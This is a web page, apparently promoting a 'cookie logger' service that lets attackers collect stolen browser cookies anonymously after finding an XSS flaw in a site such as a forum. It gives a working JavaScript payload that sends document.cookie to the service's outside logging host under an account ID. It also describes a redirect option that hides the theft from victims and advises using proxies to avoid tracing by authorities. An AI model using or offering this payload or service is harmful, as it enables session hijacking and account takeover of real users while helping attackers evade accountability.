Imagine you're at the stage where you've read through 1000 lines of code to see how a forum parses certain input. You've finally found an attack vector, tested in on your localhost and everything is good to go. You can successfully steal cookies. You're about to implement this on your vulnerable site when you realise that to steal cookies you need to include your sites url in the attack. This means it can be traced to your domain, and from there a WHOIS directs people to you. You can't obfuscate your URL because it has to be a reversible process, and the admin is clever. What do you do? You need a 3rd party that can log the cookies and still let only you read them.
This is where I come in. This project will let you set up an account and direct the cookies directly into that account. That's it, you can now anonymously steal cookies.
I'm not here to tell you about how a cookie stealer works, but I will tell you how to direct your cookies into your account. Let's say your account ID is 123456 (it's always six digits)
You then need to have that as the very first thing in the query string. The following code for instance will work:
location.href = "http://ccl.whiteacid.org/log.php?123456"+document.cookie
Things to note are log.php, that's what logs things and the ?123456 means it'll go into the account with ID=123456. Then directly after (with no deliminator) whatever you want to log.
The other thing you need to know is that the server will automatically clear any logged data older than 7 days and any account not used in 2 months. An account is used when it's logged into, not when data is sent to it.
As of version 1.1.3 an optional parameter can be passed in the querystring. You can pass ccl_redirect in the query string and set it equal to a url.
The url should be a full url (minus the starting http:// bit). This is the url the script will forward the user to once the logging has been done.
If not specified it'll default to /transp.gif, which is a 1x1 transparent .gif image.
The ethics of a project like this is obviously dubious, though funnily enough at the time of writing I have only used this system to test it, not for any nefarious purposes. It should be known that my site is hosted by dreamhost.com, while they are a great host it means I have no control over my logs. If a government body wants access to my logs and has the legal rights there is nothing I can do, I may not even be notified. For this reason you should use some sort of proxy when setting up an account or using it.
Right here.
Right here